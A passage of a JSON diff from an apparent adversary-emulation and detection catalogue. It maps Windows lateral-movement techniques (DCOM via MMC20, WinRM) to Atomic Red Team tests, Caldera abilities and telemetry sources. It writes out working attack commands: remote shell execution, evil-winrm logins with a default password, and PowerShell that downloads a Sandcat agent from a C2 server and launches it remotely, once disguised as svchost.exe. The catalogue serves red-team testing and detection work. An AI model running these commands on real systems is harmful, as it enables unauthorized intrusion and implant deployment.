"data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "network share access", + "description": "A network share was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "network share" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview", + "https://docs.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview" + ] + ] + }, + { + "technique_id": "T1021.003", + "command_list": [ + "[activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.application\",\"localhost\")).Document.ActiveView.ExecuteShellCommand(\"c:\\windows\\system32\\calc.exe\", $null, $null, \"7\")\n" + ], + "commands": [ + { + "command": "[activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.application\",\"localhost\")).Document.ActiveView.ExecuteShellCommand(\"c:\\windows\\system32\\calc.exe\", $null, $null, \"7\")\n", + "source": "atomics/T1021.003/T1021.003.yaml", + "name": "Atomic Red Team Test - Remote Services: Distributed Component Object Model" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1021.003", + "display_name": "Remote Services: Distributed Component Object Model", + "atomic_tests": [ + { + "name": "PowerShell Lateral Movement using MMC20", + "auto_generated_guid": "6dc74eb1-c9d6-4c53-b3b5-6f50ae339673", + "description": "Powershell lateral movement using the mmc20 application com object.\n\nReference:\n\nhttps://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/\n\nUpon successful execution, cmd will spawn calc.exe on a remote computer.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "computer_name": { + "description": "Name of Computer", + "type": "String", + "default": "localhost" + } + }, + "executor": { + "command": "[activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.application\",\"#{computer_name}\")).Document.ActiveView.ExecuteShellCommand(\"c:\\windows\\system32\\calc.exe\", $null, $null, \"7\")\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null + ] + }, + { + "technique_id": "T1021.006", + "command_list": [ + "Enable-PSRemoting -Force\n", + "invoke-command -ComputerName localhost -scriptblock {#{remote_command}}\n", + "invoke-command -ComputerName #{host_name} -scriptblock {ipconfig}\n", + "evil-winrm -i #{destination_address} -u Domain\\Administrator -p #{password}", + "evil-winrm -i Target -u #{user_name} -p #{password}", + "evil-winrm -i #{destination_address} -u #{user_name} -p P@ssw0rd1", + "$server=\"#{server}\";\n$sharePath=\"#{share}\";\nSet-Location $sharePath;$url=\"$($server)/file/download\";\n$wc=New-Object System.Net.WebClient;$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"sandcat.go\");($data=$wc.DownloadData($url)) -and\n($name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\"))\n-and ([io.file]::WriteAllBytes(\"$($sharePath)$name.exe\",$data));\n$startServer=\"$($sharePath)$name.exe -server $($server) \";Invoke-Command\n-ScriptBlock {Param([string]$startServer, $sharePath, $name, $server) Invoke-WmiMethod\n-Class Win32_Process -Name Create -ArgumentList \"$($sharePath)$name.exe\n-server $server -v\" } -ComputerName #{remote.host.name} -ArgumentList $startServer, $sharePath, $name, $server\n", + "$username = \"#{domain.user.name}\";\n$password = \"#{domain.user.password}\";\n$secstr = New-Object -TypeName System.Security.SecureString;\n$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;\nInvoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\\Users\\Public\\svchost.exe -server #{server} }};\nStart-Sleep -s 5;\nRemove-PSSession -Session $session;\n" + ], + "commands": [ + { + "command": "Enable-PSRemoting -Force\n", + "source": "atomics/T1021.006/T1021.006.yaml", + "name": "Atomic Red Team Test - Remote Services: Windows Remote Management" + }, + { + "command": "invoke-command -ComputerName localhost -scriptblock {#{remote_command}}\n", + "source": "atomics/T1021.006/T1021.006.yaml", + "name": "Atomic Red Team Test - Remote Services: Windows Remote Management" + }, + { + "command": "invoke-command -ComputerName #{host_name} -scriptblock {ipconfig}\n", + "source": "atomics/T1021.006/T1021.006.yaml", + "name": "Atomic Red Team Test - Remote Services: Windows Remote Management" + }, + { + "command": "evil-winrm -i #{destination_address} -u Domain\\Administrator -p #{password}", + "source": "atomics/T1021.006/T1021.006.yaml", + "name": "Atomic Red Team Test - Remote Services: Windows Remote Management" + }, + { + "command": "evil-winrm -i Target -u #{user_name} -p #{password}", + "source": "atomics/T1021.006/T1021.006.yaml", + "name": "Atomic Red Team Test - Remote Services: Windows Remote Management" + }, + { + "command": "evil-winrm -i #{destination_address} -u #{user_name} -p P@ssw0rd1", + "source": "atomics/T1021.006/T1021.006.yaml", + "name": "Atomic Red Team Test - Remote Services: Windows Remote Management" + }, + { + "command": "$server=\"#{server}\";\n$sharePath=\"#{share}\";\nSet-Location $sharePath;$url=\"$($server)/file/download\";\n$wc=New-Object System.Net.WebClient;$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"sandcat.go\");($data=$wc.DownloadData($url)) -and\n($name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\"))\n-and ([io.file]::WriteAllBytes(\"$($sharePath)$name.exe\",$data));\n$startServer=\"$($sharePath)$name.exe -server $($server) \";Invoke-Command\n-ScriptBlock {Param([string]$startServer, $sharePath, $name, $server) Invoke-WmiMethod\n-Class Win32_Process -Name Create -ArgumentList \"$($sharePath)$name.exe\n-server $server -v\" } -ComputerName #{remote.host.name} -ArgumentList $startServer, $sharePath, $name, $server\n", + "source": "data/abilities/lateral-movement/3734aa1e-c536-42b3-8912-4c91b8bdce90.yml", + "name": "Copy Sandcat file using PowerShell" + }, + { + "command": "$username = \"#{domain.user.name}\";\n$password = \"#{domain.user.password}\";\n$secstr = New-Object -TypeName System.Security.SecureString;\n$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;\nInvoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\\Users\\Public\\svchost.exe -server #{server} }};\nStart-Sleep -s 5;\nRemove-PSSession -Session $session;\n", + "source": "data/abilities/lateral-movement/41bb2b7a-75af-49fd-bd15-6c827df25921.yml", + "name": "Start Agent using WinRM (WinRM)" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1021.006", + "display_name": "Remote Services: Windows Remote Management", + "atomic_tests": [ + { + "name": "Enable Windows Remote Management", + "auto_generated_guid": "9059e8de-3d7d-4954-a322-46161880b9cf", + "description": "Powershell Enable WinRM\n\nUpon successful execution, powershell will \"Enable-PSRemoting\" allowing for remote PS access.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Enable-PSRemoting -Force\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Invoke-Command", + "auto_generated_guid": "5295bd61-bd7e-4744-9d52-85962a4cf2d6", + "description": "Execute Invoke-command on remote host.\n\nUpon successful execution, powershell will execute ipconfig on localhost using `invoke-command`.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "host_name": { + "description": "Remote Windows Host Name", + "type": "String", + "default": "localhost" + }, + "remote_command": { + "description": "Command to execute on remote Host", + "type": "String", + "default": "ipconfig" + } + }, + "executor": { + "command": "invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}\n", + "name": "powershell" + } + }, + { + "name": "WinRM Access with Evil-WinRM", + "auto_generated_guid": "efe86d95-44c4-4509-ae42-7bfd9d1f5b3d", + "description": "An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "user_name": { + "description": "Username", + "type": "String", + "default": "Domain\\Administrator" + }, + "destination_address": { + "description": "Remote Host IP or Hostname", + "type": "String", + "default": "Target" + }, + "password": { + "description": "Password", + "type": "String", + "default": "P@ssw0rd1" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must have Ruby Installed", + "prereq_command": "try {if (ruby -v) {exit 0} else {exit 1}} catch {exit 1}", + "get_prereq_command": "Invoke-WebRequest -OutFile $env:Temp\\rubyinstaller-2.7.1-1-x64.exe https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-2.7.1-1/rubyinstaller-2.7.1-1-x64.exe\n$file1= $env:Temp + \"\\rubyinstaller-2.7.1-1-x64.exe\"\nStart-Process $file1 /S;" + }, + { + "description": "Computer must have Evil-WinRM installed", + "prereq_command": "try {if (evil-winrm -h) {exit 0} else {exit 1}} catch {exit 1}", + "get_prereq_command": "gem install evil-winrm" + } + ], + "executor": { + "command": "evil-winrm -i #{destination_address} -u #{user_name} -p #{password}", + "name": "powershell", + "elevation_required": true + } + } + ] + }, + { + "id": "3734aa1e-c536-42b3-8912-4c91b8bdce90", + "description": "Copy Sandcat file using PowerShell", + "name": "Copy Sandcat File using Powershell", + "tactic": "lateral-movement", + "technique": { + "attack_id": "T1021.006", + "name": "Remote Services: Windows Remote Management" + }, + "platforms": { + "windows": { + "psh": { + "command": "$server=\"#{server}\";\n$sharePath=\"#{share}\";\nSet-Location $sharePath;$url=\"$($server)/file/download\";\n$wc=New-Object System.Net.WebClient;$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"sandcat.go\");($data=$wc.DownloadData($url)) -and\n($name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\"))\n-and ([io.file]::WriteAllBytes(\"$($sharePath)$name.exe\",$data));\n$startServer=\"$($sharePath)$name.exe -server $($server) \";Invoke-Command\n-ScriptBlock {Param([string]$startServer, $sharePath, $name, $server) Invoke-WmiMethod\n-Class Win32_Process -Name Create -ArgumentList \"$($sharePath)$name.exe\n-server $server -v\" } -ComputerName #{remote.host.name} -ArgumentList $startServer, $sharePath, $name, $server\n", + "cleanup": "del sandcat.go-windows; Invoke-Command -ComputerName", + "payloads": [ + "sandcat.go-windows" + ] + } + } + }, + "singleton": true + }, + { + "id": "41bb2b7a-75af-49fd-bd15-6c827df25921", + "name": "Start 